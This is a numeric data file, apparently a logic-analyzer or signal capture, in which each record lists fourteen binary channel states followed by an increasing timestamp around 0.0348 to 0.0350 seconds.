0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4825684e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,3.4825712e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4825736e-02 0,0,0,1,1,1,0,0,0,1,0,0,0,0,3.4825740e-02 0,0,0,1,1,1,0,0,0,1,0,0,1,0,3.4825788e-02 0,0,0,1,1,1,0,0,0,1,0,0,0,0,3.4825812e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4825820e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,3.4825836e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4825860e-02 0,0,0,1,1,1,0,0,0,1,0,0,0,0,3.4825868e-02 0,0,0,1,1,1,0,0,0,1,0,0,1,0,3.4825884e-02 0,0,0,1,1,1,0,0,0,1,0,0,0,0,3.4825912e-02 0,0,0,1,1,1,0,0,0,1,0,0,1,0,3.4825936e-02 0,0,0,1,1,1,0,0,0,1,0,0,0,0,3.4825964e-02 0,0,0,1,1,1,0,0,0,1,0,0,1,0,3.4825988e-02 0,0,0,1,1,1,0,0,0,1,0,0,0,0,3.4826012e-02 0,0,0,1,1,1,0,0,0,1,0,0,1,0,3.4826036e-02 0,0,0,1,1,1,0,0,0,1,0,0,0,0,3.4826060e-02 0,0,0,1,1,1,0,0,0,1,0,0,1,0,3.4826088e-02 0,0,0,1,1,1,0,0,0,1,0,0,0,0,3.4826112e-02 0,0,0,1,1,1,0,0,0,1,0,0,1,0,3.4826164e-02 0,0,0,1,1,1,0,0,0,1,0,0,0,0,3.4826188e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4826196e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,3.4826212e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4826236e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,3.4826260e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4826284e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,3.4826312e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4826336e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,3.4826364e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4826388e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,3.4826412e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4826436e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,3.4826460e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4826484e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,3.4826512e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4826536e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,3.4826564e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4826588e-02 0,0,0,1,1,1,0,0,0,1,0,0,0,0,3.4826592e-02 0,0,0,1,1,1,0,0,0,1,0,0,1,0,3.4826636e-02 0,0,0,1,1,1,0,0,0,1,0,0,0,0,3.4826660e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4826668e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,3.4826688e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4826712e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,3.4826740e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4826764e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,3.4826788e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4826812e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,3.4826836e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4826860e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,3.4826888e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4826912e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,3.4826940e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4826964e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,3.4826988e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4827012e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,3.4827036e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4827060e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,3.4827088e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4827112e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,3.4827164e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4827188e-02 0,0,0,1,1,1,0,0,0,1,0,0,0,0,3.4827192e-02 0,0,0,1,1,1,0,0,0,1,0,0,1,0,3.4827236e-02 0,0,0,1,1,1,0,0,0,1,0,0,0,0,3.4827260e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4827268e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,3.4827288e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4827312e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,3.4827336e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4827364e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,3.4827388e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4827412e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,3.4827436e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4827460e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,3.4827488e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4827516e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,3.4827540e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4827564e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,3.4827588e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4827612e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,3.4827636e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4827660e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,3.4827688e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4827712e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,3.4827736e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4827764e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,3.4827788e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4827812e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,3.4827836e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4827860e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,3.4827888e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4827912e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,3.4827940e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4827964e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,3.4827988e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4828012e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,3.4828036e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4828060e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,3.4828088e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4828112e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,3.4828140e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4828164e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,3.4828188e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4828212e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,3.4828236e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4828260e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,3.4828288e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4828312e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,3.4828336e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4828364e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,3.4828388e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4828412e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,3.4828436e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4828460e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,3.4828484e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4828512e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,3.4828536e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4828564e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,3.4828588e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4828612e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,3.4828636e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4828660e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,3.4828688e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4828712e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,3.4828740e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4828764e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,3.4828788e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4828812e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,3.4828836e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4828860e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,3.4828888e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4828912e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,3.4828936e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4828964e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,3.4828988e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4829012e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,3.4829036e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4829060e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,3.4829088e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4829112e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,3.4829140e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4829164e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,3.4829188e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4829212e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,3.4829236e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4829260e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,3.4829284e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4829312e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,3.4829340e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4829364e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,3.4829388e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4829412e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,3.4829436e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4829460e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,3.4829484e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4829512e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,3.4829536e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4829564e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,3.4829588e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4829612e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,3.4829636e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4829660e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,3.4829684e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4829712e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,3.4829736e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4829764e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,3.4829788e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4829812e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,3.4829836e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4829860e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,3.4829884e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4829912e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,3.4829936e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4829964e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,3.4829988e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4830012e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,3.4830036e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4830060e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,3.4830088e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4830112e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,3.4830136e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4830164e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,3.4830188e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4830212e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,3.4830236e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4830260e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,3.4830284e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4830312e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,3.4830340e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4830364e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,3.4830388e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4830412e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,3.4830436e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4830460e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,3.4830484e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4830512e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,3.4830540e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4830564e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,3.4830588e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4830612e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,3.4830636e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4830660e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,3.4830684e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4830712e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,3.4830736e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4830760e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,3.4830788e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4830812e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,3.4830836e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4830860e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,3.4830888e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4830912e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,3.4830936e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4830964e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,1,3.4955788e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,1,3.4955980e-02 1,0,0,1,1,0,0,0,0,0,0,1,0,1,3.4956012e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,1,3.4956036e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,1,3.4956348e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,1,3.4956380e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,1,3.4956404e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,1,3.4956428e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,1,3.4956452e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,1,3.4956480e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,1,3.4956504e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,1,3.4956532e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,1,3.4956556e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,1,3.4956580e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,1,3.4956604e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.4956620e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4956628e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.4956652e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4956680e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.4956704e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4956732e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.4956756e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4956780e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.4956804e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4956828e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.4956852e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4956880e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.4956904e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4956932e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.4956956e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4956980e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.4957004e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4957028e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.4957052e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4957076e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.4957104e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4957124e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.4957152e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4957180e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.4957204e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4957228e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.4957252e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4957276e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.4957304e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4957328e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.4957352e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4957380e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.4957404e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4957428e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.4957452e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4957476e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.4957500e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4957528e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.4957552e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4957576e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.4957604e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4957628e-02 1,0,0,1,1,1,0,0,0,1,0,0,0,0,3.4957632e-02 1,0,0,1,1,1,0,0,0,1,0,0,1,0,3.4957676e-02 1,0,0,1,1,1,0,0,0,1,0,0,0,0,3.4957700e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4957708e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.4957728e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4957752e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.4957780e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4957804e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.4957832e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4957860e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.4957884e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4957908e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.4957932e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4957956e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.4958008e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4958032e-02 1,0,0,1,1,1,0,0,0,1,0,0,0,0,3.4958036e-02 1,0,0,1,1,1,0,0,0,1,0,0,1,0,3.4958060e-02 1,0,0,1,1,1,0,0,0,1,0,0,0,0,3.4958084e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4958092e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.4958108e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4958132e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.4958156e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4958180e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.4958208e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4958232e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.4958260e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4958284e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.4958308e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4958332e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.4958356e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4958380e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.4958408e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4958432e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.4958460e-02 1,0,0,1,1,0,0,0,0,1,0,0,0,0,3.4958484e-02 1,0,0,1,1,1,0,0,0,1,0,0,0,0,3.4958488e-02 1,0,0,1,1,1,0,0,0,1,0,0,1,0,3.4958532e-02 1,0,0,1,1,1,0,0,0,1,0,0,0,0,3.4958556e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4958564e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.4958580e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4958608e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.4958632e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4958656e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.4958684e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4958708e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.4958732e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4958756e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.4958780e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4958804e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.4958832e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4958860e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.4958884e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4958908e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.4958932e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4958956e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.4959008e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4959032e-02 1,0,0,1,1,1,0,0,0,1,0,0,0,0,3.4959036e-02 1,0,0,1,1,1,0,0,0,1,0,0,1,0,3.4959060e-02 1,0,0,1,1,1,0,0,0,1,0,0,0,0,3.4959084e-02 1,0,0,1,1,1,0,0,0,1,0,0,1,0,3.4959132e-02 1,0,0,1,1,1,0,0,0,1,0,0,0,0,3.4959156e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4959164e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.4959180e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4959208e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.4959232e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4959256e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.4959284e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4959308e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.4959332e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4959356e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.4959380e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4959408e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.4959432e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4959460e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.4959484e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4959508e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.4959532e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4959556e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.4959580e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4959608e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.4959632e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4959660e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.4959684e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4959708e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.4959732e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4959756e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.4959780e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4959808e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.4959832e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4959860e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.4959884e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4959908e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.4959932e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4959956e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.4959980e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4960008e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.4960032e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4960060e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.4960084e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4960108e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.4960132e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4960156e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.4960180e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4960208e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.4960232e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4960260e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.4960284e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4960308e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.4960332e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4960356e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.4960380e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4960408e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.4960432e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4960460e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.4960484e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4960508e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.4960532e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4960556e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.4960580e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4960612e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.4960632e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4960660e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.4960684e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4960708e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.4960732e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4960756e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.4960784e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4960812e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.4960836e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4960860e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.4960884e-02 